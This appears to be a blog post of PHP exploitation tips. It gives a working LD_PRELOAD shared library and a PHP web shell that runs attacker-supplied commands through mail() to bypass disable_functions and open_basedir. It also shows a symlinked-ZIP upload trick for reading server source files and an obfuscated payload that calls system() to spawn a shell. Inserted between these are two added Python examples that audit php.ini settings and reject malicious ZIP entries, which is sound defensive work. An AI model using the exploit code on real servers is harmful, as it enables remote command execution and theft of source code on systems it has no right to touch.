Just some tips I found useful

PHP

Bypass open_basedir and “disabled” functionality

```c
/* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Run the command and redirect its output to a file the PHP script reads back. */
void payload(char *cmd) {
  char buf[512];
  /* snprintf bounds the write; the original strcpy/strcat pair overflowed buf on long commands */
  snprintf(buf, sizeof buf, "%s > /tmp/_0utput.txt", cmd);
  system(buf);
}

/* sendmail, spawned by PHP's mail(), calls geteuid() early on. With the library
   preloaded, this override runs inside that child process, outside PHP's
   disable_functions and open_basedir. */
int geteuid() {
  char *cmd;
  if (getenv("LD_PRELOAD") == NULL) { return 0; }
  unsetenv("LD_PRELOAD");              /* don't re-trigger in the command we spawn */
  if ((cmd = getenv("_evilcmd")) != NULL) {
    payload(cmd);
  }
  return 1;
}
```
```php
<?php
  $cmd = $_GET['cmd'];

  // putenv() is usually not in disable_functions, so LD_PRELOAD can be set from PHP
  echo putenv("LD_PRELOAD=/var/www/html/upload/XXXXXXXXXXXX-evil.so");
  echo putenv("_evilcmd=" . $cmd);
  // mail() forks the external sendmail binary, which picks up LD_PRELOAD
  echo mail("a@example.com", "a", "a");
  show_source("/tmp/_0utput.txt");
?>
```
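The trick works because putenv() is allowed, mail() forks an external sendmail binary that honours LD_PRELOAD, and that child process is not bound by PHP's disable_functions. The following Python audit is added here as an example (it is not part of the original tips): it parses a php.ini-style text and reports whether putenv and mail are disabled and open_basedir is set. Both sample configurations are constructed.

```python
"""Audit a php.ini-style configuration for the settings that block the
LD_PRELOAD/mail() trick: putenv() and mail() in disable_functions, and an
open_basedir restriction.  Added example with constructed sample configs."""

# Functions whose availability makes the trick work: putenv() sets LD_PRELOAD,
# mail() forks the sendmail binary that loads it, and the exec-style functions
# are what the preloaded library ultimately substitutes for.
REQUIRED_DISABLED = {
    "putenv", "mail", "system", "exec", "shell_exec",
    "passthru", "proc_open", "popen",
}

# Constructed sample: a common default that leaves putenv/mail usable
WEAK_INI = """
[PHP]
; exec-style functions are disabled, but putenv and mail are not
disable_functions = system,exec,shell_exec,passthru,proc_open,popen
open_basedir =
"""

# Constructed sample: the hardened counterpart
HARDENED_INI = """
[PHP]
disable_functions = "system,exec,shell_exec,passthru,proc_open,popen,putenv,mail"
open_basedir = "/var/www/html:/tmp"
"""


def parse_php_ini(text):
    """Return a dict of directive -> value, ignoring comments and [sections]."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment in php.ini
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip('"')
    return settings


def audit(settings):
    """Return a list of findings; an empty list means the trick is blocked."""
    findings = []
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        findings.append("disable_functions is missing: " + ", ".join(missing))
    if not settings.get("open_basedir"):
        findings.append("open_basedir is not set")
    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(parse_php_ini(ini)) or "OK")
```

disable_functions can only be set in php.ini (it is PHP_INI_SYSTEM), so auditing the file rather than ini_get() output is the right place to look; if mail() cannot be disabled for an application, a sendmail_path that does not honour LD_PRELOAD is the fallback.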

Upload zip file

  • ZIP link

```shell
$ ln -s ../../../../../var/www/index.php myfile
[...]
$ zip --symlinks a.zip myfile
```

By uploading the ZIP file, if the website unzips it without checking for symlinks, it will be possible to retrieve the source code.
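The defence is to inspect the archive before extracting it. The following Python code is an added example, not part of the original tips: it builds a constructed archive with a symlink entry (the analogue of the zip --symlinks command above) plus a path-traversal entry, and rejects both before anything is written to disk.

```python
"""Reject uploaded ZIP archives containing symlinks or entries that escape the
destination directory.  Added example using only the standard library; the
sample archive is constructed in build_sample_zip()."""
import io
import os
import stat
import zipfile


def zip_entry_is_symlink(info):
    """ZIP stores the Unix mode bits in the high 16 bits of external_attr."""
    return stat.S_ISLNK(info.external_attr >> 16)


def check_zip(zf, dest):
    """Return a list of (name, reason) for entries that must be rejected."""
    dest = os.path.realpath(dest)
    bad = []
    for info in zf.infolist():
        if zip_entry_is_symlink(info):
            bad.append((info.filename, "symlink"))
            continue
        target = os.path.realpath(os.path.join(dest, info.filename))
        if os.path.commonpath([dest, target]) != dest:
            bad.append((info.filename, "path traversal"))
    return bad


def safe_extract(zf, dest):
    """Extract only if every entry passed the checks."""
    problems = check_zip(zf, dest)
    if problems:
        raise ValueError("rejected archive: %r" % problems)
    zf.extractall(dest)


def build_sample_zip():
    """Constructed sample: one regular file, one symlink entry pointing at
    index.php, and one entry with '..' in its name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
        link = zipfile.ZipInfo("myfile")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16   # mark entry as symlink
        zf.writestr(link, "../../../../../var/www/index.php")  # link target is the entry body
        zf.writestr("../evil.txt", "zip slip")
    buf.seek(0)
    return buf


def find_bad_entries(data, dest="/var/www/html/upload"):
    """Check an archive given as a file-like object against a (hypothetical) upload directory."""
    with zipfile.ZipFile(data) as zf:
        return check_zip(zf, dest)


if __name__ == "__main__":
    print(find_bad_entries(build_sample_zip()))
```

Note that zipfile's extractall() already neutralises the .. entry, but it will happily write a symlink's target text as a regular file and other unzip tools will create the link itself, so the check has to be done on the entry metadata, not left to the extractor.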

Bypass protection (get /bin/sh)

```php
// 'a' splits "systaem" into ["syst", "em"]; implode() joins them back into "system"
define(v, systaem);
// 'x' splits "shxsh" into ["sh", "sh"]: the arguments handed to system()
define(y, shxsh);
// array_map(system, ["sh", "sh"]) runs sh without the literal words "system" or "sh" appearing in quotes
array_map(implode(explode(a, v)), explode(x, y));
// The bare words rely on undefined constants being treated as strings (a warning before PHP 8, an Error from PHP 8.0 on)
```
Last updated on Friday, July 10, 2020
Published on Friday, July 10, 2020